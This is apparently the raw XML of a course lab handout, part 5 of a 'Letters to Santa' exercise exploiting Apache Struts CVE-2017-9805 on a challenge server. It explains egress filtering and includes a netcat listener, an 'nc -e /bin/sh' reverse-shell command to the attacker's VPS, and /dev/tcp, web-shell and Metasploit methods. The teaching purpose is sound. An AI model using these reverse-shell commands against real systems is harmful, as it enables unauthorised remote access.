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9EE21" w14:textId="4FC38C7B" w:rsidR="00335021" w:rsidRDefault="00335021" w:rsidP="00335021">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Letters to Santa--a real world attack</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>Part 5, the Attack Gets Serious</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45254335" w14:textId="00471125" w:rsidR="004A3478" w:rsidRDefault="00335021">
      <w:r>
        <w:t>In Part 4, you should have been able to get Letters to Santa to ping your AWS instance.</w:t>
      </w:r>
      <w:r w:rsidR="008C2BA0">
        <w:t xml:space="preserve">  The Python script that exploits the Apache Struts vulnerability doesn’t return data from the target, so we made the target do something that we could detect:  ping our AWS instance (also called a Virtual Private Server, or VPS.)  The script, cve-2017-9805.py, came from the GitHub page mention</w:t>
      </w:r>
      <w:r w:rsidR="00C87BA5">
        <w:t>ed</w:t>
      </w:r>
      <w:r w:rsidR="008C2BA0">
        <w:t xml:space="preserve"> in the SANS </w:t>
      </w:r>
      <w:r w:rsidR="00C87BA5">
        <w:t xml:space="preserve">Penetration Testing </w:t>
      </w:r>
      <w:r w:rsidR="008C2BA0">
        <w:t>blog.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="225E6822" w14:textId="2144D302" w:rsidR="008C2BA0" w:rsidRDefault="008C2BA0">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="685FBD4E" wp14:editId="5689EA01">
            <wp:extent cx="5943600" cy="2397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7125"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="496AEAA0" w14:textId="7EA7D712" w:rsidR="008C2BA0" w:rsidRDefault="008C2BA0">
      <w:r>
        <w:t xml:space="preserve">It ran, but did it do anything?  </w:t>
      </w:r>
      <w:r w:rsidR="00C87BA5">
        <w:t xml:space="preserve">The AWS </w:t>
      </w:r>
      <w:r w:rsidR="00BA28E7">
        <w:t xml:space="preserve">VPS </w:t>
      </w:r>
      <w:r w:rsidR="00C87BA5">
        <w:t>shows us the results.</w:t>
      </w:r>
      <w:r w:rsidR="00BB60B9">
        <w:t xml:space="preserve">  (We started tcpdump *before* we executed the exploit code above.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1661EFE2" w14:textId="77A5FE46" w:rsidR="008C2BA0" w:rsidRDefault="008C2BA0">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3618C8E1" wp14:editId="09C967FE">
            <wp:extent cx="5943600" cy="286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5755"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6603C51D" w14:textId="0C481E8C" w:rsidR="008C2BA0" w:rsidRDefault="008C2BA0">
      <w:r>
        <w:t xml:space="preserve">Yes!  </w:t>
      </w:r>
      <w:r w:rsidR="004E6AA4">
        <w:t xml:space="preserve">The dev server is vulnerable to </w:t>
      </w:r>
      <w:r w:rsidR="009A3AED">
        <w:t>CVE-2017-9805.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C8A75E" w14:textId="210067AF" w:rsidR="00F07F89" w:rsidRDefault="00932619" w:rsidP="00932619">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>The Attack Continues--Reverse Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="279666BD" w14:textId="02397D67" w:rsidR="00932619" w:rsidRDefault="00932619">
      <w:r>
        <w:t>In penetration testing jargon, a “reverse” shell happens when</w:t>
      </w:r>
      <w:r w:rsidR="001E4284">
        <w:t xml:space="preserve"> we force</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the target </w:t>
      </w:r>
      <w:r w:rsidR="001E4284">
        <w:t>to connect back to the attacker with a shell.  Reverse shells are desirable because many organizations block incoming traffic to their servers (other than ports 80/443 for a web server, for example), but not outbound traffic.  If we force the target to listen on a port that’s not already in use, the firewall will block our attempts to connect to it.  If we force the target to connect to us, it will succeed if the organization does not do egress filtering (block unexpected outbound traffic.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="728C76C3" w14:textId="046CC898" w:rsidR="001E4284" w:rsidRDefault="001E4284" w:rsidP="001E4284">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>The Easy Way--Netcat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C582671" w14:textId="60B0E46E" w:rsidR="001E4284" w:rsidRDefault="001E4284" w:rsidP="001E4284">
      <w:r>
        <w:t>It is unwise to install Netcat on a server since it can be abused (as we are about to</w:t>
      </w:r>
      <w:r w:rsidR="0008383D">
        <w:t xml:space="preserve"> do</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.)  </w:t>
      </w:r>
      <w:r w:rsidR="00822BDC">
        <w:t>However, maybe Alabaster has not been careful.</w:t>
      </w:r>
      <w:r w:rsidR="00C15E61">
        <w:t xml:space="preserve">  A good Netcat cheat sheet is available </w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidR="00C15E61" w:rsidRPr="00C15E61">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>here</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00C15E61">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00CD3092">
        <w:t xml:space="preserve">  You may have to install Netcat on your VPS (</w:t>
      </w:r>
      <w:r w:rsidR="00CD3092" w:rsidRPr="00CD3092">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">yum install </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00CD3092" w:rsidRPr="00CD3092">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00CD3092">
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7045B678" w14:textId="7754E9DD" w:rsidR="00822BDC" w:rsidRDefault="00822BDC" w:rsidP="001E4284">
      <w:r>
        <w:t>There are two steps we need to follow to create a reverse shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E270FA" w14:textId="05783480" w:rsidR="00822BDC" w:rsidRDefault="00822BDC" w:rsidP="00822BDC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Start a listener on an IP address and port number that the target can access.  The IP address must be a </w:t>
      </w:r>
      <w:r w:rsidR="00001091">
        <w:t>private</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> address, so we’ll run the listener on our VPS (Virtual Private Server, in our case our AWS instance.)  The port number should be above 1024.  Remember that in Linux it takes root access to listen on a port below 1024.</w:t>
      </w:r>
      <w:r w:rsidR="00C15E61">
        <w:t xml:space="preserve">  The </w:t>
      </w:r>
      <w:r w:rsidR="00365AB8">
        <w:t>syntax is:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="730DFF3F" w14:textId="26F885A6" w:rsidR="00365AB8" w:rsidRPr="00FC279A" w:rsidRDefault="00365AB8" w:rsidP="00365AB8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00365AB8">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00365AB8">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> -lv &lt;port&gt;</w:t>
      </w:r>
      <w:r w:rsidR="00FC279A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FC279A" w:rsidRPr="003E7317">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Note</w:t>
      </w:r>
      <w:r w:rsidR="00FC279A" w:rsidRPr="00FC279A">
        <w:t>:  different version</w:t>
      </w:r>
      <w:r w:rsidR="006840E0">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00FC279A" w:rsidRPr="00FC279A">
        <w:t xml:space="preserve"> of Netcat have </w:t>
      </w:r>
      <w:r w:rsidR="00FC279A">
        <w:t xml:space="preserve">different syntax.  In some versions, you </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="0068710C">
        <w:t>have to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="0068710C">
        <w:t xml:space="preserve"> put the</w:t>
      </w:r>
      <w:r w:rsidR="00FC279A">
        <w:t xml:space="preserve"> -p option</w:t>
      </w:r>
      <w:r w:rsidR="0068710C">
        <w:t xml:space="preserve"> before</w:t>
      </w:r>
      <w:r w:rsidR="0098445B">
        <w:t xml:space="preserve"> port number</w:t>
      </w:r>
      <w:r w:rsidR="00FC279A">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="0068710C">
        <w:t xml:space="preserve">  The </w:t>
      </w:r>
      <w:r w:rsidR="0068710C" w:rsidRPr="0068710C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>-l</w:t>
      </w:r>
      <w:r w:rsidR="0068710C">
        <w:t xml:space="preserve"> option tells netcat to listen, and the </w:t>
      </w:r>
      <w:r w:rsidR="0068710C" w:rsidRPr="0068710C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>-v</w:t>
      </w:r>
      <w:r w:rsidR="0068710C">
        <w:t xml:space="preserve"> option gives verbose output so you can see what it is doing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CD205F1" w14:textId="0DD514B7" w:rsidR="004E28FD" w:rsidRDefault="00822BDC" w:rsidP="00822BDC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Run a command on the server that causes it to connect to our listener and give us shell.</w:t>
      </w:r>
      <w:r w:rsidR="004E28FD">
        <w:t xml:space="preserve">  There is a handy list of methods </w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidR="004E28FD" w:rsidRPr="004E28FD">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>here</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="004E28FD">
        <w:t>, which give us the netcat syntax:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7558AD60" w14:textId="3E395BB0" w:rsidR="00822BDC" w:rsidRDefault="004E28FD" w:rsidP="004E28FD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004E28FD">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004E28FD">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> -e /bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004E28FD">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004E28FD">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;</w:t>
      </w:r>
      <w:r w:rsidR="0008383D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">VPS </w:t>
      </w:r>
      <w:r w:rsidRPr="004E28FD">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>IP address</w:t>
      </w:r>
      <w:r w:rsidR="0008383D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> or domain name</w:t>
      </w:r>
      <w:r w:rsidRPr="004E28FD">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>&gt; &lt;port&gt;</w:t>
      </w:r>
      <w:r w:rsidR="00365AB8">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004E28FD">
        <w:t>Note that i</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">t also says that netcat should not be installed, and if it is, the version that allows command execution </w:t>
      </w:r>
      <w:r w:rsidR="0008383D">
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="0008383D" w:rsidRPr="0068710C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>-e</w:t>
      </w:r>
      <w:r w:rsidR="0008383D">
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r>
        <w:t>should not be installed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E8D9F11" w14:textId="1A1C4BB6" w:rsidR="004E28FD" w:rsidRDefault="004E28FD" w:rsidP="004E28FD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A913466" w14:textId="11DE5894" w:rsidR="004E28FD" w:rsidRPr="0008383D" w:rsidRDefault="00C15E61" w:rsidP="004E28FD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Remember to allow the port</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:t xml:space="preserve"> number you use on your Netcat listener through the firewall on your VPS before you start!</w:t>
      </w:r>
      <w:r w:rsidR="0008383D">
        <w:t xml:space="preserve">  It would be wise to test your listener before you start the attack.  Start the listener, and then use Netcat on your workstation to connect to it.</w:t>
      </w:r>
      <w:r w:rsidR="0008383D">
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0008383D" w:rsidRPr="0008383D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0008383D" w:rsidRPr="0008383D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0008383D" w:rsidRPr="004E28FD">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidR="0008383D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">VPS </w:t>
      </w:r>
      <w:r w:rsidR="0008383D" w:rsidRPr="004E28FD">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>IP address</w:t>
      </w:r>
      <w:r w:rsidR="0008383D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> or domain name</w:t>
      </w:r>
      <w:r w:rsidR="0008383D" w:rsidRPr="004E28FD">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>&gt; &lt;port&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DEB98DD" w14:textId="4B5621E8" w:rsidR="00C15E61" w:rsidRDefault="0094254F" w:rsidP="0094254F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Another Way--Bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="425FA935" w14:textId="689054D2" w:rsidR="0094254F" w:rsidRDefault="0094254F" w:rsidP="004E28FD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Remember that everything in Linux is represented as a file, including network connections.  A connection can be represented in file format as </w:t>
      </w:r>
      <w:r w:rsidRPr="0094254F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>/dev/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0094254F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0094254F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>/&lt;IP address&gt;/&lt;port&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.   Clever use of redirection may allow an attacker to create a reverse shell.  You can find an excellent </w:t>
      </w:r>
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidRPr="0008383D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>explanation here</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0094254F">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="0008383D">
        <w:t xml:space="preserve">  A securely configured server should not allow this either, but it is often missed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0412DF33" w14:textId="63095203" w:rsidR="0010204F" w:rsidRDefault="0010204F" w:rsidP="004E28FD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="779C168D" w14:textId="4D34C291" w:rsidR="0010204F" w:rsidRDefault="009965A6" w:rsidP="0010204F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Sparkle Redberry’s Way</w:t>
      </w:r>
      <w:r w:rsidR="0010204F">
        <w:t>--Web Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DCEE0BA" w14:textId="78510094" w:rsidR="0010204F" w:rsidRDefault="0010204F" w:rsidP="004E28FD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:t>This is where Sparkle’s Hints 3</w:t>
      </w:r>
      <w:r w:rsidR="009965A6">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="009965A6">
        <w:t>, and 5</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> lead you.  </w:t>
      </w:r>
      <w:r w:rsidR="009965A6">
        <w:t xml:space="preserve">The shell she proposes in Hint 4 is simple and effective, but there is a “gotcha” that caught me, and many of the participants in the original contest.  From your reconnaissance, you should have determined that l2s.northpolechristmastown.com is an Nginx server and that dev.northpolechristmastown.com is an Apache Struts server.  Apache Struts runs JavaScript and </w:t>
      </w:r>
      <w:r w:rsidR="007834C6">
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009965A6">
        <w:t>jsp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009965A6">
        <w:t xml:space="preserve"> pages.  Nginx can run PHP, and its web root is usually in the same place as a standard </w:t>
      </w:r>
      <w:r w:rsidR="009965A6">
        <w:lastRenderedPageBreak/>
        <w:t>Apache server.  Both dev and l2s have the same IP address.  In fact, they could be on the same box!  The gotcha that caught many of us was that we used the Struts vulnerability on dev to upload PHP pages, but we didn’t think to check for results on the server that can run PHP.  (That’s a hint.)</w:t>
      </w:r>
      <w:r w:rsidR="003E7317">
        <w:t xml:space="preserve">  This method is a little more complex than the simple Netcat or BASH attacks</w:t>
      </w:r>
      <w:r w:rsidR="00DA52F9">
        <w:t>.  It has advantages, since it</w:t>
      </w:r>
      <w:r w:rsidR="003E7317">
        <w:t xml:space="preserve"> does not involve the server sending outbound traffic on strange ports</w:t>
      </w:r>
      <w:r w:rsidR="00DA52F9">
        <w:t>, and it does not require a VPS listener.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E7552C5" w14:textId="20EB5D35" w:rsidR="0094254F" w:rsidRPr="0094254F" w:rsidRDefault="0094254F" w:rsidP="0094254F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Yet Another Way--Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C9D4DEC" w14:textId="26240562" w:rsidR="0094254F" w:rsidRDefault="0094254F" w:rsidP="004E28FD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:t>In this method, you use MSF Venom to create a small payload that you upload to the target.</w:t>
      </w:r>
      <w:r w:rsidR="00CD3092">
        <w:t xml:space="preserve">  You create a listener using a Metasploit handler.  The payload connects back to the handler and establishes a powerful Meterpreter shell.</w:t>
      </w:r>
      <w:r w:rsidR="006625A9">
        <w:t xml:space="preserve">  The shell will run with the rights generated by the exploit.  For web sites, this is usually the user that the web site runs under--hopefully not root!</w:t>
      </w:r>
      <w:r w:rsidR="00CD3092">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:hyperlink r:id="rId10" w:history="1">
        <w:r w:rsidR="00CD3092" w:rsidRPr="0008383D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>This blog</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00CD3092">
        <w:t xml:space="preserve"> shows you how to do it.  If you don’t have a public IP address, you will have to install Metasploit on your VPS, or create a new instance based </w:t>
      </w:r>
      <w:r w:rsidR="0008383D">
        <w:t>on</w:t>
      </w:r>
      <w:r w:rsidR="00CD3092">
        <w:t xml:space="preserve"> the </w:t>
      </w:r>
      <w:hyperlink r:id="rId11" w:history="1">
        <w:r w:rsidR="00CD3092" w:rsidRPr="00DE2773">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Kali image</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00CD3092">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="0010204F">
        <w:t xml:space="preserve">  I won’t cover this one in the solutions, although it is </w:t>
      </w:r>
      <w:r w:rsidR="003E7317">
        <w:t>the method</w:t>
      </w:r>
      <w:r w:rsidR="0010204F">
        <w:t xml:space="preserve"> many attackers would </w:t>
      </w:r>
      <w:r w:rsidR="003E7317">
        <w:t>use.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7279E016" w14:textId="70429356" w:rsidR="00CD3092" w:rsidRDefault="00CD3092" w:rsidP="00CD3092">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Questions Part 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="451B4786" w14:textId="473431BE" w:rsidR="00CD3092" w:rsidRPr="00D97D07" w:rsidRDefault="00CD3092" w:rsidP="00CD3092">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D97D07">
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>Use one or more of the methods above to obtain reverse shell on the dev.northpolechristmastown.com server.  What methods were you able to get to work?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38651D04" w14:textId="21C49B25" w:rsidR="00D97D07" w:rsidRPr="00D97D07" w:rsidRDefault="00D97D07" w:rsidP="00CD3092">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D97D07">
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>Turn in screen shots of your commands and the shell.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00D97D07" w:rsidRPr="00D9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90946"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="13C4B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25D09"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="291EA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32507"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5022A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21"/>
    <w:rsid w:val="00001091"/>
    <w:rsid w:val="0008383D"/>
    <w:rsid w:val="0010204F"/>
    <w:rsid w:val="00141642"/>
    <w:rsid w:val="00153C54"/>
    <w:rsid w:val="001E4284"/>
    <w:rsid w:val="00335021"/>
    <w:rsid w:val="00365AB8"/>
    <w:rsid w:val="003E7317"/>
    <w:rsid w:val="004A3478"/>
    <w:rsid w:val="004C7BC3"/>
    <w:rsid w:val="004E28FD"/>
    <w:rsid w:val="004E6AA4"/>
    <w:rsid w:val="006625A9"/>
    <w:rsid w:val="006840E0"/>
    <w:rsid w:val="00685BCE"/>
    <w:rsid w:val="0068710C"/>
    <w:rsid w:val="007834C6"/>
    <w:rsid w:val="00822BDC"/>
    <w:rsid w:val="008C2BA0"/>
    <w:rsid w:val="00932619"/>
    <w:rsid w:val="0094254F"/>
    <w:rsid w:val="0098445B"/>
    <w:rsid w:val="009965A6"/>
    <w:rsid w:val="009A3AED"/>
    <w:rsid w:val="00BA28E7"/>
    <w:rsid w:val="00BB60B9"/>
    <w:rsid w:val="00C15E61"/>
    <w:rsid w:val="00C70FC9"/>
    <w:rsid w:val="00C87BA5"/>
    <w:rsid w:val="00CD3092"/>
    <w:rsid w:val="00D97D07"/>
    <w:rsid w:val="00DA52F9"/>
    <w:rsid w:val="00DE2773"/>
    <w:rsid w:val="00F07F89"/>
    <w:rsid w:val="00FC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2C05"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{AE502D75-070C-4BA7-A8DF-0DC14C25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4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6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428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22BDC"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="004E28FD"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="004E28FD"/>
    <w:rPr>
      <w:color w:val="808080"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E6E6E6"/>
    </w:rPr>
  </w:style>
